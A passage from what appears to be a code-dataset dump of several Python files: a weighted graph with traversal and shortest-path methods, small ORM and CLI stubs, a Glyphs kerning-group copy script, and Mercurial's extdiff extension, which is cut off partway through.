def breadth_first_traversal(self, start_val):
"""Get the full visited path of a breadth first traversal."""
if start_val not in self.graph:
raise ValueError('Value is not in the graph.')
result = [start_val]
row = [start_val]
while row:
nxt_row = []
for node in row:
neighbors = self.graph[node]
for neighbor in neighbors:
if neighbor not in result:
nxt_row.append(neighbor)
result.append(neighbor)
row = nxt_row
return result
def depth_first_traversal(self, start_val):
"""Get the full visited path of a depth first traversal."""
def dive(val, path):
neighbors = self.graph[val]
for node in neighbors:
if node not in path:
path.append(node)
dive(node, path)
if start_val not in self.graph:
raise ValueError('Value is not in the graph.')
result = [start_val]
dive(start_val, result)
return result
def dijkstra_min(self, start, end):
"""Find the shortest path from the starting to ending node.
Uses Dijkstra's algorithm to determine the path.
"""
if start not in self.graph or end not in self.graph:
raise ValueError('Node not in graph.')
if start == end:
return [start]
final = {start: (0, start)}
search = {n: (float('inf'), None) for n in self.graph if n != start}
curr = start
while search:
path = final[curr][0]
neighbors = {n: self.graph[curr][n] for n in self.graph[curr]
if n not in final}
for n in neighbors:
if path + neighbors[n] < search[n][0]:
search[n] = (path + neighbors[n], curr)
curr = min(search, key=lambda n: search[n][0])
final[curr] = search[curr]
del search[curr]
if curr == end:
break
min_path = [end]
curr = end
prev = final[curr][1]
if prev is None:
raise ValueError('Start and end do not connect.')
while curr != prev:
min_path.append(prev)
curr = prev
prev = final[curr][1]
return list(reversed(min_path))
def bellman_ford_min(self, start, end):
"""Find the shortest path from the starting to ending node.
Uses Bellman Ford's algorithm to determine the path.
"""
if start not in self.graph or end not in self.graph:
raise ValueError('Node not in graph.')
if start == end:
return [start]
distance = {n: float('inf') for n in self.graph}
parent = {n: None for n in self.graph}
distance[start] = 0
for _ in range(len(self.graph) - 1):
for edge_start, edge_end, weight in self.edges():
if distance[edge_end] > distance[edge_start] + weight:
distance[edge_end] = distance[edge_start] + weight
parent[edge_end] = edge_start
min_path = []
curr = end
if parent[curr] is None:
raise ValueError('Start and end do not connect.')
while curr is not None:
min_path.append(curr)
curr = parent[curr]
return list(reversed(min_path))
| """Implement a weighted graph."""
class Graph(object):
"""Structure for values in a weighted graph."""
def __init__(self):
"""Create a graph with no values."""
self.graph = {}
def nodes(self):
"""Get all nodes in the graph to display in list form."""
return list(self.graph)
def edges(self):
"""Get all edges in graph to display in list of tuples with weights."""
edge_list = []
for start in self.graph:
for end in self.graph[start]:
edge_list.append((start, end, self.graph[start][end]))
return edge_list
def add_node(self, val):
"""Add a node with a value to the graph."""
self.graph.setdefault(val, {})
def add_edge(self, val1, val2, weight):
"""Add an edge from val1 to val2 with the given weight.
If the node for either value does not exist, it is added to the graph.
"""
if val1 == val2:
raise ValueError('Edge needs two different values.')
self.add_node(val1)
self.add_node(val2)
self.graph[val1][val2] = weight
def del_node(self, val):
"""Remove the node with the given value from the graph.
Also removes all edges connected to the node.
"""
if val not in self.graph:
raise ValueError('Value is not in the graph.')
del self.graph[val]
for node in self.graph:
if val in self.graph[node]:
del self.graph[node][val]
def del_edge(self, val1, val2):
"""Remove the edge connecting node of val1 to node of val2."""
try:
del self.graph[val1][val2]
except KeyError:
raise ValueError('Edge is not in the graph.')
def has_node(self, val):
"""Check if the given value is in the graph."""
return val in self.graph
def neighbors(self, val):
"""List all nodes the node of the given value connects to."""
if val not in self.nodes():
raise ValueError('Value is not in the graph.')
return list(self.graph[val])
def adjacent(self, val1, val2):
"""Check if there is an edge connecting the nodes with given values."""
if val1 not in self.nodes() or val2 not in self.nodes():
raise ValueError('Value is not in the graph.')
return val2 in self.graph[val1]
def breadth_first_traversal(self, start_val):
"""Get the full visited path of a breadth first traversal."""
if start_val not in self.graph:
raise ValueError('Value is not in the graph.')
result = [start_val]
row = [start_val]
while row:
nxt_row = []
for node in row:
neighbors = self.graph[node]
for neighbor in neighbors:
if neighbor not in result:
nxt_row.append(neighbor)
result.append(neighbor)
row = nxt_row
return result
def depth_first_traversal(self, start_val):
"""Get the full visited path of a depth first traversal."""
def dive(val, path):
neighbors = self.graph[val]
for node in neighbors:
if node not in path:
path.append(node)
dive(node, path)
if start_val not in self.graph:
raise ValueError('Value is not in the graph.')
result = [start_val]
dive(start_val, result)
return result
def dijkstra_min(self, start, end):
"""Find the shortest path from the starting to ending node.
Uses Dijkstra's algorithm to determine the path.
"""
if start not in self.graph or end not in self.graph:
raise ValueError('Node not in graph.')
if start == end:
return [start]
final = {start: (0, start)}
search = {n: (float('inf'), None) for n in self.graph if n != start}
curr = start
while search:
path = final[curr][0]
neighbors = {n: self.graph[curr][n] for n in self.graph[curr]
if n not in final}
for n in neighbors:
if path + neighbors[n] < search[n][0]:
search[n] = (path + neighbors[n], curr)
curr = min(search, key=lambda n: search[n][0])
final[curr] = search[curr]
del search[curr]
if curr == end:
break
min_path = [end]
curr = end
prev = final[curr][1]
if prev is None:
raise ValueError('Start and end do not connect.')
while curr != prev:
min_path.append(prev)
curr = prev
prev = final[curr][1]
return list(reversed(min_path))
def bellman_ford_min(self, start, end):
"""Find the shortest path from the starting to ending node.
Uses Bellman Ford's algorithm to determine the path.
"""
if start not in self.graph or end not in self.graph:
raise ValueError('Node not in graph.')
if start == end:
return [start]
distance = {n: float('inf') for n in self.graph}
parent = {n: None for n in self.graph}
distance[start] = 0
for _ in range(len(self.graph) - 1):
for edge_start, edge_end, weight in self.edges():
if distance[edge_end] > distance[edge_start] + weight:
distance[edge_end] = distance[edge_start] + weight
parent[edge_end] = edge_start
min_path = []
curr = end
if parent[curr] is None:
raise ValueError('Start and end do not connect.')
while curr is not None:
min_path.append(curr)
curr = parent[curr]
return list(reversed(min_path))
| pt | 0.188522 | 4.220698 | 4 |
sqlitedb/settings.py | BelovN/orm | 1 | 13588 | <filename>sqlitedb/settings.py<gh_stars>1-10
class BaseCommand:
def __init__(self, table_name):
self.table_name = table_name
self._can_add = True
@staticmethod
def _convert_values(values):
converted = [SQLType.convert(v) for v in values]
return converted
def check_intersection(self, other):
return self.where.check_intersection(other)
DB_NAME = 'database.db'
| <filename>sqlitedb/settings.py<gh_stars>1-10
class BaseCommand:
def __init__(self, table_name):
self.table_name = table_name
self._can_add = True
@staticmethod
def _convert_values(values):
converted = [SQLType.convert(v) for v in values]
return converted
def check_intersection(self, other):
return self.where.check_intersection(other)
DB_NAME = 'database.db'
| none | 1 | 2.507151 | 3 |
hon/commands/clean.py | swquinn/hon | 0 | 13589 | import click
from ..cli import with_context
@click.command('clean', short_help="Cleans a book' output directories")
@with_context
def clean_command(ctx=None):
pass
| import click
from ..cli import with_context
@click.command('clean', short_help="Cleans a book' output directories")
@with_context
def clean_command(ctx=None):
pass
| none | 1 | 1.448618 | 1 |
Kerning/Steal Kerning Groups from Font.py | justanotherfoundry/Glyphs-Scripts | 283 | 13590 | #MenuTitle: Steal Kerning Groups from Font
"""Copy kerning groups from one font to another."""
from __future__ import print_function
import vanilla
class GroupsCopy(object):
"""GUI for copying kerning groups from one font to another"""
def __init__(self):
self.w = vanilla.FloatingWindow((400, 70), "Steal kerning groups")
self.w.text_anchor = vanilla.TextBox((15, 12+2, 130, 14), "Copy groups from:", sizeStyle='small')
self.w.from_font = vanilla.PopUpButton((150, 12, 150, 17), self.GetFonts(isSourceFont=True), sizeStyle='small', callback=self.buttonCheck)
self.w.text_value = vanilla.TextBox((15, 12+2+25, 130, 14), "To selected glyphs in:", sizeStyle='small')
self.w.to_font = vanilla.PopUpButton((150, 12+25, 150, 17), self.GetFonts(isSourceFont=False), sizeStyle='small', callback=self.buttonCheck)
self.w.copybutton = vanilla.Button((-80, 12+25, -15, 17), "Copy", sizeStyle='small', callback=self.copyGroups)
self.w.setDefaultButton( self.w.copybutton )
self.w.open()
self.buttonCheck(None)
def GetFonts(self, isSourceFont):
myFontList = [ "%s - %s" % ( x.font.familyName, x.selectedFontMaster().name ) for x in Glyphs.orderedDocuments() ]
if isSourceFont:
myFontList.reverse()
return myFontList
def buttonCheck(self, sender):
fromFont = self.w.from_font.getItems()[ self.w.from_font.get() ]
toFont = self.w.to_font.getItems()[ self.w.to_font.get() ]
if fromFont == toFont:
self.w.copybutton.enable( onOff=False )
else:
self.w.copybutton.enable( onOff=True )
def copyGroups(self, sender):
fromFont = self.w.from_font.getItems()[ self.w.from_font.get() ]
toFont = self.w.to_font.getItems()[ self.w.to_font.get() ]
Doc_source = [ x for x in Glyphs.orderedDocuments() if ("%s - %s" % ( x.font.familyName, x.selectedFontMaster().name )) == fromFont ][0]
Master_source = Doc_source.selectedFontMaster().id
Font_source = Doc_source.font
Font_target = [ x.font for x in Glyphs.orderedDocuments() if ("%s - %s" % ( x.font.familyName, x.selectedFontMaster().name )) == toFont ][0]
Glyphs_selected = [ x.parent for x in Font_target.parent.selectedLayers() ]
print("Syncing kerning groups for", len(Glyphs_selected), "glyphs from", Font_source.familyName, "to", Font_target.familyName, ":")
try:
for thisGlyph in Glyphs_selected:
glyphName = thisGlyph.name
try:
sourceGlyph = Font_source.glyphs[ glyphName ]
oldL = thisGlyph.leftKerningGroup
oldR = thisGlyph.rightKerningGroup
newL = sourceGlyph.leftKerningGroup
newR = sourceGlyph.rightKerningGroup
if oldL != newL or oldR != newR:
thisGlyph.leftKerningGroup = newL
thisGlyph.rightKerningGroup = newR
print(" ", glyphName, ":", newL, "<--->", newR)
# start: temporary fix for 3.0.3 unwrapped vertical kerning
def kerningGetter(kerning):
if kerning is not None and not isinstance(kerning, str):
kerning = kerning()
return kerning
# end: temporary fix for 3.0.3 unwrapped vertical kerning
oldT = kerningGetter(thisGlyph.topKerningGroup)
oldB = kerningGetter(thisGlyph.bottomKerningGroup)
newT = kerningGetter(sourceGlyph.topKerningGroup)
newB = kerningGetter(sourceGlyph.bottomKerningGroup)
if oldT != newT or oldB != newB:
thisGlyph.leftKerningGroup = newL
thisGlyph.setTopKerningGroup_(newT)
thisGlyph.setBottomKerningGroup_(newB)
print(" ", glyphName, ":", newT, "\n ^\n |\n V\n", newB)
pass
except Exception as e:
print(" ", glyphName,": Error")
# print e
except Exception as e:
import traceback
print(traceback.format_exc())
finally:
print("Done.")
self.w.close()
GroupsCopy()
| #MenuTitle: Steal Kerning Groups from Font
"""Copy kerning groups from one font to another."""
from __future__ import print_function
import vanilla
class GroupsCopy(object):
"""GUI for copying kerning groups from one font to another"""
def __init__(self):
self.w = vanilla.FloatingWindow((400, 70), "Steal kerning groups")
self.w.text_anchor = vanilla.TextBox((15, 12+2, 130, 14), "Copy groups from:", sizeStyle='small')
self.w.from_font = vanilla.PopUpButton((150, 12, 150, 17), self.GetFonts(isSourceFont=True), sizeStyle='small', callback=self.buttonCheck)
self.w.text_value = vanilla.TextBox((15, 12+2+25, 130, 14), "To selected glyphs in:", sizeStyle='small')
self.w.to_font = vanilla.PopUpButton((150, 12+25, 150, 17), self.GetFonts(isSourceFont=False), sizeStyle='small', callback=self.buttonCheck)
self.w.copybutton = vanilla.Button((-80, 12+25, -15, 17), "Copy", sizeStyle='small', callback=self.copyGroups)
self.w.setDefaultButton( self.w.copybutton )
self.w.open()
self.buttonCheck(None)
def GetFonts(self, isSourceFont):
myFontList = [ "%s - %s" % ( x.font.familyName, x.selectedFontMaster().name ) for x in Glyphs.orderedDocuments() ]
if isSourceFont:
myFontList.reverse()
return myFontList
def buttonCheck(self, sender):
fromFont = self.w.from_font.getItems()[ self.w.from_font.get() ]
toFont = self.w.to_font.getItems()[ self.w.to_font.get() ]
if fromFont == toFont:
self.w.copybutton.enable( onOff=False )
else:
self.w.copybutton.enable( onOff=True )
def copyGroups(self, sender):
fromFont = self.w.from_font.getItems()[ self.w.from_font.get() ]
toFont = self.w.to_font.getItems()[ self.w.to_font.get() ]
Doc_source = [ x for x in Glyphs.orderedDocuments() if ("%s - %s" % ( x.font.familyName, x.selectedFontMaster().name )) == fromFont ][0]
Master_source = Doc_source.selectedFontMaster().id
Font_source = Doc_source.font
Font_target = [ x.font for x in Glyphs.orderedDocuments() if ("%s - %s" % ( x.font.familyName, x.selectedFontMaster().name )) == toFont ][0]
Glyphs_selected = [ x.parent for x in Font_target.parent.selectedLayers() ]
print("Syncing kerning groups for", len(Glyphs_selected), "glyphs from", Font_source.familyName, "to", Font_target.familyName, ":")
try:
for thisGlyph in Glyphs_selected:
glyphName = thisGlyph.name
try:
sourceGlyph = Font_source.glyphs[ glyphName ]
oldL = thisGlyph.leftKerningGroup
oldR = thisGlyph.rightKerningGroup
newL = sourceGlyph.leftKerningGroup
newR = sourceGlyph.rightKerningGroup
if oldL != newL or oldR != newR:
thisGlyph.leftKerningGroup = newL
thisGlyph.rightKerningGroup = newR
print(" ", glyphName, ":", newL, "<--->", newR)
# start: temporary fix for 3.0.3 unwrapped vertical kerning
def kerningGetter(kerning):
if kerning is not None and not isinstance(kerning, str):
kerning = kerning()
return kerning
# end: temporary fix for 3.0.3 unwrapped vertical kerning
oldT = kerningGetter(thisGlyph.topKerningGroup)
oldB = kerningGetter(thisGlyph.bottomKerningGroup)
newT = kerningGetter(sourceGlyph.topKerningGroup)
newB = kerningGetter(sourceGlyph.bottomKerningGroup)
if oldT != newT or oldB != newB:
thisGlyph.leftKerningGroup = newL
thisGlyph.setTopKerningGroup_(newT)
thisGlyph.setBottomKerningGroup_(newB)
print(" ", glyphName, ":", newT, "\n ^\n |\n V\n", newB)
pass
except Exception as e:
print(" ", glyphName,": Error")
# print e
except Exception as e:
import traceback
print(traceback.format_exc())
finally:
print("Done.")
self.w.close()
GroupsCopy()
| pt | 0.13012 | 2.920191 | 3 |
eggs/mercurial-2.2.3-py2.7-linux-x86_64-ucs4.egg/hgext/extdiff.py | bopopescu/phyG | 0 | 13591 | # extdiff.py - external diff program support for mercurial
#
# Copyright 2006 <NAME> <<EMAIL>>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''command to allow external programs to compare revisions
The extdiff Mercurial extension allows you to use external programs
to compare revisions, or revision with working directory. The external
diff programs are called with a configurable set of options and two
non-option arguments: paths to directories containing snapshots of
files to compare.
The extdiff extension also allows you to configure new diff commands, so
you do not need to type :hg:`extdiff -p kdiff3` always. ::
[extdiff]
# add new command that runs GNU diff(1) in 'context diff' mode
cdiff = gdiff -Nprc5
## or the old way:
#cmd.cdiff = gdiff
#opts.cdiff = -Nprc5
# add new command called vdiff, runs kdiff3
vdiff = kdiff3
# add new command called meld, runs meld (no need to name twice)
meld =
# add new command called vimdiff, runs gvimdiff with DirDiff plugin
# (see http://www.vim.org/scripts/script.php?script_id=102) Non
# English user, be sure to put "let g:DirDiffDynamicDiffText = 1" in
# your .vimrc
vimdiff = gvim -f "+next" \\
"+execute 'DirDiff' fnameescape(argv(0)) fnameescape(argv(1))"
Tool arguments can include variables that are expanded at runtime::
$parent1, $plabel1 - filename, descriptive label of first parent
$child, $clabel - filename, descriptive label of child revision
$parent2, $plabel2 - filename, descriptive label of second parent
$root - repository root
$parent is an alias for $parent1.
The extdiff extension will look in your [diff-tools] and [merge-tools]
sections for diff tool arguments, when none are specified in [extdiff].
::
[extdiff]
kdiff3 =
[diff-tools]
kdiff3.diffargs=--L1 '$plabel1' --L2 '$clabel' $parent $child
You can use -I/-X and list of file or directory names like normal
:hg:`diff` command. The extdiff extension makes snapshots of only
needed files, so running the external diff program will actually be
pretty fast (at least faster than having to compare the entire tree).
'''
from mercurial.i18n import _
from mercurial.node import short, nullid
from mercurial import scmutil, scmutil, util, commands, encoding
import os, shlex, shutil, tempfile, re
def snapshot(ui, repo, files, node, tmproot):
'''snapshot files as of some revision
if not using snapshot, -I/-X does not work and recursive diff
in tools like kdiff3 and meld displays too many files.'''
dirname = os.path.basename(repo.root)
if dirname == "":
dirname = "root"
if node is not None:
dirname = '%s.%s' % (dirname, short(node))
base = os.path.join(tmproot, dirname)
os.mkdir(base)
if node is not None:
ui.note(_('making snapshot of %d files from rev %s\n') %
(len(files), short(node)))
else:
ui.note(_('making snapshot of %d files from working directory\n') %
(len(files)))
wopener = scmutil.opener(base)
fns_and_mtime = []
ctx = repo[node]
for fn in files:
wfn = util.pconvert(fn)
if not wfn in ctx:
# File doesn't exist; could be a bogus modify
continue
ui.note(' %s\n' % wfn)
dest = os.path.join(base, wfn)
fctx = ctx[wfn]
data = repo.wwritedata(wfn, fctx.data())
if 'l' in fctx.flags():
wopener.symlink(data, wfn)
else:
wopener.write(wfn, data)
if 'x' in fctx.flags():
util.setflags(dest, False, True)
if node is None:
fns_and_mtime.append((dest, repo.wjoin(fn),
os.lstat(dest).st_mtime))
return dirname, fns_and_mtime
def dodiff(ui, repo, diffcmd, diffopts, pats, opts):
'''Do the actuall diff:
- copy to a temp structure if diffing 2 internal revisions
- copy to a temp structure if diffing working revision with
another one and more than 1 file is changed
- just invoke the diff for a single file in the working dir
'''
revs = opts.get('rev')
change = opts.get('change')
args = ' '.join(diffopts)
do3way = '$parent2' in args
if revs and change:
msg = _('cannot specify --rev and --change at the same time')
raise util.Abort(msg)
elif change:
node2 = scmutil.revsingle(repo, change, None).node()
node1a, node1b = repo.changelog.parents(node2)
else:
node1a, node2 = scmutil.revpair(repo, revs)
if not revs:
node1b = repo.dirstate.p2()
else:
node1b = nullid
# Disable 3-way merge if there is only one parent
if do3way:
if node1b == nullid:
do3way = False
matcher = scmutil.match(repo[node2], pats, opts)
mod_a, add_a, rem_a = map(set, repo.status(node1a, node2, matcher)[:3])
if do3way:
mod_b, add_b, rem_b = map(set, repo.status(node1b, node2, matcher)[:3])
else:
mod_b, add_b, rem_b = set(), set(), set()
modadd = mod_a | add_a | mod_b | add_b
common = modadd | rem_a | rem_b
if not common:
return 0
tmproot = tempfile.mkdtemp(prefix='extdiff.')
try:
# Always make a copy of node1a (and node1b, if applicable)
dir1a_files = mod_a | rem_a | ((mod_b | add_b) - add_a)
dir1a = snapshot(ui, repo, dir1a_files, node1a, tmproot)[0]
rev1a = '@%d' % repo[node1a].rev()
if do3way:
dir1b_files = mod_b | rem_b | ((mod_a | add_a) - add_b)
dir1b = snapshot(ui, repo, dir1b_files, node1b, tmproot)[0]
rev1b = '@%d' % repo[node1b].rev()
else:
dir1b = None
rev1b = ''
fns_and_mtime = []
# If node2 in not the wc or there is >1 change, copy it
dir2root = ''
rev2 = ''
if node2:
dir2 = snapshot(ui, repo, modadd, node2, tmproot)[0]
rev2 = '@%d' % repo[node2].rev()
elif len(common) > 1:
#we only actually need to get the files to copy back to
#the working dir in this case (because the other cases
#are: diffing 2 revisions or single file -- in which case
#the file is already directly passed to the diff tool).
dir2, fns_and_mtime = snapshot(ui, repo, modadd, None, tmproot)
else:
# This lets the diff tool open the changed file directly
dir2 = ''
dir2root = repo.root
label1a = rev1a
label1b = rev1b
label2 = rev2
# If only one change, diff the files instead of the directories
# Handle bogus modifies correctly by checking if the files exist
if len(common) == 1:
common_file = util.localpath(common.pop())
dir1a = os.path.join(tmproot, dir1a, common_file)
label1a = common_file + rev1a
if not os.path.isfile(dir1a):
dir1a = os.devnull
if do3way:
dir1b = os.path.join(tmproot, dir1b, common_file)
label1b = common_file + rev1b
if not os.path.isfile(dir1b):
dir1b = os.devnull
dir2 = os.path.join(dir2root, dir2, common_file)
label2 = common_file + rev2
# Function to quote file/dir names in the argument string.
# When not operating in 3-way mode, an empty string is
# returned for parent2
replace = dict(parent=dir1a, parent1=dir1a, parent2=dir1b,
plabel1=label1a, plabel2=label1b,
clabel=label2, child=dir2,
root=repo.root)
def quote(match):
key = match.group()[1:]
if not do3way and key == 'parent2':
return ''
return util.shellquote(replace[key])
# Match parent2 first, so 'parent1?' will match both parent1 and parent
regex = '\$(parent2|parent1?|child|plabel1|plabel2|clabel|root)'
if not do3way and not re.search(regex, args):
args += ' $parent1 $child'
args = re.sub(regex, quote, args)
cmdline = util.shellquote(diffcmd) + ' ' + args
ui.debug('running %r in %s\n' % (cmdline, tmproot))
util.system(cmdline, cwd=tmproot, out=ui.fout)
for copy_fn, working_fn, mtime in fns_and_mtime:
if os.lstat(copy_fn).st_mtime != mtime:
ui.debug('file changed while diffing. '
'Overwriting: %s (src: %s)\n' % (working_fn, copy_fn))
util.copyfile(copy_fn, working_fn)
return 1
finally:
ui.note(_('cleaning up temp directory\n'))
shutil.rmtree(tmproot)
def extdiff(ui, repo, *pats, **opts):
'''use external program to diff repository (or selected files)
Show differences between revisions for the specified files, using
an external program. The default program used is diff, with
default options "-Npru".
To select a different program, use the -p/--program option. The
program will be passed the names of two directories to compare. To
pass additional options to the program, use -o/--option. These
will be passed before the names of the directories to compare.
When two revision arguments are given, then changes are shown
between those revisions. If only one revision is specified then
that revision is compared to the working directory, and, when no
revisions are specified, the working directory files are compared
to its parent.'''
program = opts.get('program')
option = opts.get('option')
if not program:
program = 'diff'
option = option or ['-Npru']
return dodiff(ui, repo, program, option, pats, opts)
cmdtable = {
"extdiff":
(extdiff,
[('p', 'program', '',
_('comparison program to run'), _('CMD')),
('o', 'option', [],
_('pass option to comparison program'), _('OPT')),
('r', 'rev', [],
_('revision'), _('REV')),
('c', 'change', '',
_('change made by revision'), _('REV')),
] + commands.walkopts,
_('hg extdiff [OPT]... [FILE]...')),
}
def uisetup(ui):
for cmd, path in ui.configitems('extdiff'):
if cmd.startswith('cmd.'):
cmd = cmd[4:]
if not path:
path = cmd
diffopts = ui.config('extdiff', 'opts.' + cmd, '')
diffopts = diffopts and [diffopts] or []
elif cmd.startswith('opts.'):
continue
else:
# command = path opts
if path:
diffopts = shlex.split(path)
path = diffopts.pop(0)
else:
path, diffopts = cmd, []
# look for diff arguments in [diff-tools] then [merge-tools]
if diffopts == []:
args = ui.config('diff-tools', cmd+'.diffargs') or \
ui.config('merge-tools', cmd+'.diffargs')
if args:
diffopts = shlex.split(args)
def save(cmd, path, diffopts):
'''use closure to save diff command to use'''
def mydiff(ui, repo, *pats, **opts):
return dodiff(ui, repo, path, diffopts + opts['option'],
pats, opts)
doc = _('''\
use %(path)s to diff repository (or selected files)
Show differences between revisions for the specified files, using
the %(path)s program.
When two revision arguments are given, then changes are shown
between those revisions. If only one revision is specified then
that revision is compared to the working directory, and, when no
revisions are specified, the working directory files are compared
to its parent.\
''') % dict(path=util.uirepr(path))
# We must translate the docstring right away since it is
# used as a format string. The string will unfortunately
# be translated again in commands.helpcmd and this will
# fail when the docstring contains non-ASCII characters.
# Decoding the string to a Unicode string here (using the
# right encoding) prevents that.
mydiff.__doc__ = doc.decode(encoding.encoding)
return mydiff
cmdtable[cmd] = (save(cmd, path, diffopts),
cmdtable['extdiff'][1][1:],
_('hg %s [OPTION]... [FILE]...') % cmd)
| # extdiff.py - external diff program support for mercurial
#
# Copyright 2006 <NAME> <<EMAIL>>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''command to allow external programs to compare revisions
The extdiff Mercurial extension allows you to use external programs
to compare revisions, or revision with working directory. The external
diff programs are called with a configurable set of options and two
non-option arguments: paths to directories containing snapshots of
files to compare.
The extdiff extension also allows you to configure new diff commands, so
you do not need to type :hg:`extdiff -p kdiff3` always. ::
[extdiff]
# add new command that runs GNU diff(1) in 'context diff' mode
cdiff = gdiff -Nprc5
## or the old way:
#cmd.cdiff = gdiff
#opts.cdiff = -Nprc5
# add new command called vdiff, runs kdiff3
vdiff = kdiff3
# add new command called meld, runs meld (no need to name twice)
meld =
# add new command called vimdiff, runs gvimdiff with DirDiff plugin
# (see http://www.vim.org/scripts/script.php?script_id=102) Non
# English user, be sure to put "let g:DirDiffDynamicDiffText = 1" in
# your .vimrc
vimdiff = gvim -f "+next" \\
"+execute 'DirDiff' fnameescape(argv(0)) fnameescape(argv(1))"
Tool arguments can include variables that are expanded at runtime::
$parent1, $plabel1 - filename, descriptive label of first parent
$child, $clabel - filename, descriptive label of child revision
$parent2, $plabel2 - filename, descriptive label of second parent
$root - repository root
$parent is an alias for $parent1.
The extdiff extension will look in your [diff-tools] and [merge-tools]
sections for diff tool arguments, when none are specified in [extdiff].
::
[extdiff]
kdiff3 =
[diff-tools]
kdiff3.diffargs=--L1 '$plabel1' --L2 '$clabel' $parent $child
You can use -I/-X and list of file or directory names like normal
:hg:`diff` command. The extdiff extension makes snapshots of only
needed files, so running the external diff program will actually be
pretty fast (at least faster than having to compare the entire tree).
'''
from mercurial.i18n import _
from mercurial.node import short, nullid
from mercurial import scmutil, scmutil, util, commands, encoding
import os, shlex, shutil, tempfile, re
def snapshot(ui, repo, files, node, tmproot):
'''snapshot files as of some revision
if not using snapshot, -I/-X does not work and recursive diff
in tools like kdiff3 and meld displays too many files.'''
dirname = os.path.basename(repo.root)
if dirname == "":
dirname = "root"
if node is not None:
dirname = '%s.%s' % (dirname, short(node))
base = os.path.join(tmproot, dirname)
os.mkdir(base)
if node is not None:
ui.note(_('making snapshot of %d files from rev %s\n') %
(len(files), short(node)))
else:
ui.note(_('making snapshot of %d files from working directory\n') %
(len(files)))
wopener = scmutil.opener(base)
fns_and_mtime = []
ctx = repo[node]
for fn in files:
wfn = util.pconvert(fn)
if not wfn in ctx:
# File doesn't exist; could be a bogus modify
continue
ui.note(' %s\n' % wfn)
dest = os.path.join(base, wfn)
fctx = ctx[wfn]
data = repo.wwritedata(wfn, fctx.data())
if 'l' in fctx.flags():
wopener.symlink(data, wfn)
else:
wopener.write(wfn, data)
if 'x' in fctx.flags():
util.setflags(dest, False, True)
if node is None:
fns_and_mtime.append((dest, repo.wjoin(fn),
os.lstat(dest).st_mtime))
return dirname, fns_and_mtime
def dodiff(ui, repo, diffcmd, diffopts, pats, opts):
'''Do the actuall diff:
- copy to a temp structure if diffing 2 internal revisions
- copy to a temp structure if diffing working revision with
another one and more than 1 file is changed
- just invoke the diff for a single file in the working dir
'''
revs = opts.get('rev')
change = opts.get('change')
args = ' '.join(diffopts)
do3way = '$parent2' in args
if revs and change:
msg = _('cannot specify --rev and --change at the same time')
raise util.Abort(msg)
elif change:
node2 = scmutil.revsingle(repo, change, None).node()
node1a, node1b = repo.changelog.parents(node2)
else:
node1a, node2 = scmutil.revpair(repo, revs)
if not revs:
node1b = repo.dirstate.p2()
else:
node1b = nullid
# Disable 3-way merge if there is only one parent
if do3way:
if node1b == nullid:
do3way = False
matcher = scmutil.match(repo[node2], pats, opts)
mod_a, add_a, rem_a = map(set, repo.status(node1a, node2, matcher)[:3])
if do3way:
mod_b, add_b, rem_b = map(set, repo.status(node1b, node2, matcher)[:3])
else:
mod_b, add_b, rem_b = set(), set(), set()
modadd = mod_a | add_a | mod_b | add_b
common = modadd | rem_a | rem_b
if not common:
return 0
tmproot = tempfile.mkdtemp(prefix='extdiff.')
try:
# Always make a copy of node1a (and node1b, if applicable)
dir1a_files = mod_a | rem_a | ((mod_b | add_b) - add_a)
dir1a = snapshot(ui, repo, dir1a_files, node1a, tmproot)[0]
rev1a = '@%d' % repo[node1a].rev()
if do3way:
dir1b_files = mod_b | rem_b | ((mod_a | add_a) - add_b)
dir1b = snapshot(ui, repo, dir1b_files, node1b, tmproot)[0]
rev1b = '@%d' % repo[node1b].rev()
else:
dir1b = None
rev1b = ''
fns_and_mtime = []
# If node2 in not the wc or there is >1 change, copy it
dir2root = ''
rev2 = ''
if node2:
dir2 = snapshot(ui, repo, modadd, node2, tmproot)[0]
rev2 = '@%d' % repo[node2].rev()
elif len(common) > 1:
#we only actually need to get the files to copy back to
#the working dir in this case (because the other cases
#are: diffing 2 revisions or single file -- in which case
#the file is already directly passed to the diff tool).
dir2, fns_and_mtime = snapshot(ui, repo, modadd, None, tmproot)
else:
# This lets the diff tool open the changed file directly
dir2 = ''
dir2root = repo.root
label1a = rev1a
label1b = rev1b
label2 = rev2
# If only one change, diff the files instead of the directories
# Handle bogus modifies correctly by checking if the files exist
if len(common) == 1:
common_file = util.localpath(common.pop())
dir1a = os.path.join(tmproot, dir1a, common_file)
label1a = common_file + rev1a
if not os.path.isfile(dir1a):
dir1a = os.devnull
if do3way:
dir1b = os.path.join(tmproot, dir1b, common_file)
label1b = common_file + rev1b
if not os.path.isfile(dir1b):
dir1b = os.devnull
dir2 = os.path.join(dir2root, dir2, common_file)
label2 = common_file + rev2
# Function to quote file/dir names in the argument string.
# When not operating in 3-way mode, an empty string is
# returned for parent2
replace = dict(parent=dir1a, parent1=dir1a, parent2=dir1b,
plabel1=label1a, plabel2=label1b,
clabel=label2, child=dir2,
root=repo.root)
def quote(match):
key = match.group()[1:]
if not do3way and key == 'parent2':
return ''
return util.shellquote(replace[key])
# Match parent2 first, so 'parent1?' will match both parent1 and parent
regex = '\$(parent2|parent1?|child|plabel1|plabel2|clabel|root)'
if not do3way and not re.search(regex, args):
args += ' $parent1 $child'
args = re.sub(regex, quote, args)
cmdline = util.shellquote(diffcmd) + ' ' + args
ui.debug('running %r in %s\n' % (cmdline, tmproot))
util.system(cmdline, cwd=tmproot, out=ui.fout)
for copy_fn, working_fn, mtime in fns_and_mtime:
if os.lstat(copy_fn).st_mtime != mtime:
ui.debug('file changed while diffing. '
'Overwriting: %s (src: %s)\n' % (working_fn, copy_fn))
util.copyfile(copy_fn, working_fn)
return 1
finally:
ui.note(_('cleaning up temp directory\n'))
shutil.rmtree(tmproot)
def extdiff(ui, repo, *pats, **opts):
'''use external program to diff repository (or selected files)
Show differences between revisions for the specified files, using
an external program. The default program used is diff, with
default options "-Npru".
To select a different program, use the -p/--program option. The
program will be passed the names of two directories to compare. To
pass additional options to the program, use -o/--option. These
will be passed before the names of the directories to compare.
When two revision arguments are given, then changes are shown
between those revisions. If only one revision is specified then
that revision is compared to the working directory, and, when no
revisions are specified, the working directory files are compared
to its parent.'''
program = opts.get('program')
option = opts.get('option')
if not program:
program = 'diff'
option = option or ['-Npru']
return dodiff(ui, repo, program, option, pats, opts)
cmdtable = {
"extdiff":
(extdiff,
[('p', 'program', '',
_('comparison program to run'), _('CMD')),
('o', 'option', [],
_('pass option to comparison program'), _('OPT')),
